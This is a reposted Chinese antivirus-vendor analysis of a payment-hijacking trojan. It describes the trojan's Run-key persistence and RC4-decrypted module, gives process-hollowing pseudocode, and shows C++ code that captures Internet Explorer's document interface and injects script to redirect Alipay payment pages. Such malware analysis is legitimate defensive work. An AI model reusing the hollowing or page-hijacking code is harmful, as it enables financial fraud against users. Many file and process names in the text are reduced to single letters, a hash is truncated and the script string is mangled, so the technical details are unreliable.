当前位置:网站首页 >> 生活

网银猎手来袭百度杀毒国际版完美防范top-iyiou

时间:2019-06-19 02:37:29 来源:互联网 阅读:1次

银猎手来袭,百度杀毒国际版完美防范

【文章摘要】银猎手木马正悄然来袭,购木马是一种劫持用户上支付行为转而为攻击者购买虚拟物品的病毒,此类病毒能够给用户造成直接的经济损失,

百度国际化杀毒团队提醒您:使用百度杀毒国际版()有效防御购木马的入侵。

银猎手木马技术分析报告

1.基本信息

病毒名称: ihr.a

病毒别名: N/A

病毒类型: 木马

样本长度: 3,361,280字节样本MD5:6D8F7C9E44F4D5E1EEEF5BBCBB797F44

样本SHA1:CB4CABFF7A14ABCFFA278A8B0E88E文件类型:DLL

壳信息: PEtite v1.4 *

原始文件名: N/A

首次出现时间:2013年4月感染范围:亚太地区

感染系统:Windows 2000 /XP及以上

2.样本概述

近日,百度国际杀毒团队反病毒监测捕获了一个全新的AV终结者变种,该变种病毒捆绑多个木马并且利用干净程序来加载自身和购木马模块。该木马除了在文件级别上绕过主流反病毒产品检测外,也通过白+黑方式绕过国内外常见主防防御产品,截至本文版发稿为止,国内外主流反病毒产品均无法全面检测该银木马。

注:购木马是一种劫持用户上支付行为转而为攻击者购买虚拟物品的病毒,此类病毒能够给用户造成直接的经济损失,并且由于其本身不会对系统造成任何损害,因此难以检测和防御,危害极大,本文将带你一探究竟。

2.1 文件列表:

文件名.png (11.58 KiB) 被浏览 27 次

1样本文件关系图.png (103.44 KiB) 被浏览 27 次

图1:样本文件关系图

2.2详细分析

2.2.1启动和安装

病毒Loader(l)运行之后,会把自身拷贝到如下目录:

C:\Program Files\ksupdate\e [此文件即为文件列表中的e]

C:\Program Files\ksupdate\l

C:\Program Files\ksupdate\l

C:\Program Files\ksupdate\l

并且添加如下注册表项使得自己可以开机自启动:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Run"="C:\\Program Files\\ksupdate\\e"

2.2.2 AV终结者的释放和运行

然后病毒Loader会释放出文件C:\Program Files\zz,启动一个新的进程e,并将zz注入到其中执行,注入完成后,病毒Loader会删除掉刚才释放出来的文件。

zz这个模块被执行之后,会释放出病毒AV终结者,本文重点分析购木马,因此不对此变种AV终结者进行详细描述。

2.2.3购木马模块的解密和执行流程

释放完zz模块后,病毒Loader会读取t并解密出(所使用的算法是RC4,密钥为1*98$***)购木马模块,并将其写入到文件C:\Program Files\p。

2Loader正在初始化S数组.png (42.59 KiB) 被浏览 27 次

图2:Loader正在初始化S数组

3部分解密后的数据.png (35.84 KiB) 被浏览 27 次

图3:部分解密后的数据

解密之后,病毒Loader会释放出一个系统程序e (Microsoft Driver Verifier Manager)并将其作为傀儡进程启动,然后Loader会将刚才解密出来的购木马模块p注入到傀儡进程中执行,其注入方法如以下伪代码所示:

CreateProcess(...,"e",...,CREATE_SUSPEND,...);

GetThreadContext();

ZwUnmapViewOfSection(...);

VirtualAllocEx(...,ImageBase,SizeOfImage,...);

WriteProcessMemory(...,headers,...);

for (i=0; i NumberOfSections; i++) {

? WriteProcessMemory(...,section,...);

}

SetThreadContext();

ResumeThread();

同样,注入完成之后,病毒Loader会立即将文件C:\Program Files\p删除掉。

2.2.4 购木马工作流程

购木马模块会运行之后,会查找以下流行浏览器的进程并将它们结束,以强迫用户使用IE浏览器。

e

e

e

e

e

e

e

e

e

e

e

e

e

e

e

e

e

e

e

e

e

为了监控和操作用户所浏览的页,购木马需要获得IHTMLDocument2接口指针,首先它会枚举系统中所有窗口和子窗口,查找一个类名为Internet Explorer_Server的子窗口,然后向这个窗口发送消息WM_HTML_GETOBJECT,下面是范例代码:

void GetDocInterface(HWND hwnd)

{

HINSTANCE hInstance = NULL;

CComPtrIHTMLDocument2 spDoc = NULL;

LRESULT lRes;

UINT uMsg;

LPFNOBJECTFROMLRESULT pfnObjectFromLresult;

CoInitialize(NULL);

hInstance = LoadLibraryW(L"l");

uMsg = RegisterWindowMessageW(L"WM_HTML_GETOBJECT");

SendMessageTimeout(hwnd,uMsg,0L,0L,SMTO_ABORTIFHUNG,1000,(DWORD*)lRes);

pfnObjectFromLresult = (LPFNOBJECTFROMLRESULT)GetProcAddress(

hInstance,"ObjectFromLresult");

(*pfnObjectFromLresult)(lRes,IID_IHTMLDocument2,0,(void**)spDoc);

FreeLibrary(hInstance);

CoUninitialize();

}

通过调用IHTMLDocunet2-get_URL方法,购木马能够监控用户所浏览的页,如果它发现用户正在浏览支付宝的快速支付页面,它会将页面重定向到标准支付页面。

IHTMLWindow2 *spWindow2 = NULL;

VARIANT varRet = {0};

BSTR myscript;

BSTR scripttype;

BSTR current_url;

char *urlbuffer;

spDoc-get_URL(current_url);

urlbuffer = _com_util::ConvertBSTRToString(current_url);

SysFreeString(current_url);

if (urlbuffer != NULL)

{

if (strstr(urlbuffer,"standard/fastpay/m") != 0)

{

spDoc-get_parentWindow(spWindow2);

if (spWindow2 != NULL)

{

//the order_ID is dynamically generated, a typical id is as follows

//b62f306b421removed_deliberately

myscript = _com_util::ConvertStringToBSTR("ite("ef=\""")");

scripttype = _com_util::ConvertStringToBSTR("javascript");

VariantInit(varRet);

spWindow2-execScript(myscript,scripttype,varRet);

SysFreeString(myscript);

SysFreeString(scripttype);

VariantClear(varRet);

spWindow2-Release();

}

}

}

关注ITBear科技资讯公众号(itbear365 ),每天推送你感兴趣的科技内容。

特别提醒:本内容转载自其他媒体,目的在于传递更多信息,并不代表本赞同其观点。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,并请自行核实相关内容。本站不承担此类作品侵权行为的直接及连带。如若本有任何内容侵犯您的权益,请及时联系我们,本站将会在24小时内处理完毕。

12下一页

中国互联网行业报告五大特点值得关注
影视产业_电影市场-影视产业头条新闻资讯
珠海教育综合上市企业

相关文章

一周热门

热点排行

热门精选

友情链接:
媒体合作:

Copyright (c) 2011 八零CMS 版权所有 备案号:京ICP0000001号

网站地图